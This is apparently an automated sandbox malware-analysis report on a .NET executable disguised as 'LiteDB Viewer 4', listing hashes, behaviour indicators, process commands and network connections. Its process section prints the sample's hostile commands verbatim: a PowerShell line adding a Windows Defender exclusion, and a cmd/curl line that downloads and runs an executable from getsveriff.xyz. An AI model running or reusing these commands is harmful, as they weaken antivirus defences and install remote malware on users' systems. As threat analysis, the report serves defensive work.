File name:

a4ddf875f98d9aa55fccb90f19d855b5880d86a7e6c9e708e59303047ec59ca2

Full analysis: https://app.any.run/tasks/fe58bbfa-e9df-40bc-92f1-7c4953df8a76
Verdict: Malicious activity
Analysis date: May 15, 2025, 11:33:21
OS: Windows 10 Professional (build: 19044, 64 bit)
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
MD5:

98A4A47BD5AB7F26E60698F8EE14F182

SHA1:

6B703AD7C5A1471B96D0E44DE29152043B518B62

SHA256:

116DDFE8085C9509030A5DB86FF76F382C629DDB4E0B1A5ADC668DBF0F8F297F

SSDEEP:

3072:+2Fc8XPjb0LD/9K202P+2P+2P+2P+2PG2Pe2P2p:ZJLb8102P+2P+2P+2P+2PG2Pe2P

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 1628)
      • a4ddf875f98d9aa55fccb90f19d855b5880d86a7e6c9e708e59303047ec59ca2.exe (PID: 7148)
    • Changes Windows Defender settings

      • cmd.exe (PID: 1628)
  • SUSPICIOUS

    • Reads the date of Windows installation

      • a4ddf875f98d9aa55fccb90f19d855b5880d86a7e6c9e708e59303047ec59ca2.exe (PID: 7148)
    • Starts CMD.EXE for commands execution

      • a4ddf875f98d9aa55fccb90f19d855b5880d86a7e6c9e708e59303047ec59ca2.exe (PID: 7148)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1628)
    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 1628)
    • Reads security settings of Internet Explorer

      • a4ddf875f98d9aa55fccb90f19d855b5880d86a7e6c9e708e59303047ec59ca2.exe (PID: 7148)
    • Execution of CURL command

      • a4ddf875f98d9aa55fccb90f19d855b5880d86a7e6c9e708e59303047ec59ca2.exe (PID: 7148)
  • INFO

    • Reads the computer name

      • a4ddf875f98d9aa55fccb90f19d855b5880d86a7e6c9e708e59303047ec59ca2.exe (PID: 7148)
      • curl.exe (PID: 5324)
    • Checks supported languages

      • a4ddf875f98d9aa55fccb90f19d855b5880d86a7e6c9e708e59303047ec59ca2.exe (PID: 7148)
      • curl.exe (PID: 5324)
    • Process checks computer location settings

      • a4ddf875f98d9aa55fccb90f19d855b5880d86a7e6c9e708e59303047ec59ca2.exe (PID: 7148)
    • Execution of CURL command

      • cmd.exe (PID: 864)
    • Reads the software policy settings

      • slui.exe (PID: 4244)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 456)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 456)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Generic CIL Executable (.NET, Mono, etc.) (56.7)
.exe | Win64 Executable (generic) (21.3)
.scr | Windows screen saver (10.1)
.dll | Win32 Dynamic Link Library (generic) (5)
.exe | Win32 Executable (generic) (3.4)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2025:05:14 00:02:49+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32
LinkerVersion: 48
CodeSize: 181760
InitializedDataSize: 25088
UninitializedDataSize: -
EntryPoint: 0x2e426
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 4.1.0.0
ProductVersionNumber: 4.1.0.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
Comments: LiteDB Viewer 4
CompanyName: Soroush Falahati
FileDescription: LiteDB Viewer 4
FileVersion: 4.1.0.0
InternalName: LiteDBViewer.exe
LegalCopyright: Copyright © Soroush Falahati 2017
LegalTrademarks: -
OriginalFileName: LiteDBViewer.exe
ProductName: LiteDB Viewer 4
ProductVersion: 4.1.0.0
AssemblyVersion: 4.1.0.0
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
140
Monitored processes
10
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start a4ddf875f98d9aa55fccb90f19d855b5880d86a7e6c9e708e59303047ec59ca2.exe no specs cmd.exe conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs curl.exe sppextcomobj.exe no specs slui.exe slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
456powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
864"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Temp\ & curl -o tybd7.exe http://getsveriff.xyz/rvxlgh7/hrjfb.exe & start tybd7.exeC:\Windows\System32\cmd.exea4ddf875f98d9aa55fccb90f19d855b5880d86a7e6c9e708e59303047ec59ca2.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
1628"C:\Windows\System32\cmd.exe" /C powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"C:\Windows\System32\cmd.exe
a4ddf875f98d9aa55fccb90f19d855b5880d86a7e6c9e708e59303047ec59ca2.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
2772C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
4244"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
5324curl -o tybd7.exe http://getsveriff.xyz/rvxlgh7/hrjfb.exe C:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
5892\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6272\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6392C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
7148"C:\Users\admin\AppData\Local\Temp\a4ddf875f98d9aa55fccb90f19d855b5880d86a7e6c9e708e59303047ec59ca2.exe" C:\Users\admin\AppData\Local\Temp\a4ddf875f98d9aa55fccb90f19d855b5880d86a7e6c9e708e59303047ec59ca2.exeexplorer.exe
User:
admin
Company:
Soroush Falahati
Integrity Level:
MEDIUM
Description:
LiteDB Viewer 4
Exit code:
0
Version:
4.1.0.0
Modules
Images
c:\users\admin\appdata\local\temp\a4ddf875f98d9aa55fccb90f19d855b5880d86a7e6c9e708e59303047ec59ca2.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
Total events
7 045
Read events
7 045
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
1
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
456powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_mr0puzll.2cx.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
456powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4gosw1ll.csx.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
456powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:FB416FB2A9BA2F10B5C35D8A210EBBAD
SHA256:E79FBD678AA2AE61AA100355A94A0BDACA901B37A99CB6832C43D1AF9FE9F4D1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
20
DNS requests
16
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
2.16.164.17:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
2516
SIHClient.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
2516
SIHClient.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2.16.164.17:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
5324
curl.exe
212.113.122.89:80
getsveriff.xyz
INSYS LLC
RU
unknown
6544
svchost.exe
20.190.159.0:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
2104
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.104.136.2
whitelisted
google.com
  • 216.58.206.46
whitelisted
crl.microsoft.com
  • 2.16.164.17
  • 2.16.164.34
  • 2.16.164.9
  • 2.16.164.40
  • 2.16.164.18
  • 2.16.164.107
  • 2.16.164.49
  • 2.16.164.106
  • 2.16.164.51
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 23.52.120.96
whitelisted
getsveriff.xyz
  • 212.113.122.89
unknown
client.wns.windows.com
  • 172.211.123.250
whitelisted
login.live.com
  • 20.190.159.0
  • 40.126.31.2
  • 20.190.159.73
  • 40.126.31.128
  • 20.190.159.23
  • 20.190.159.2
  • 40.126.31.129
  • 40.126.31.69
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
slscr.update.microsoft.com
  • 4.245.163.56
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.242.39.171
whitelisted

Threats

No threats detected
No debug info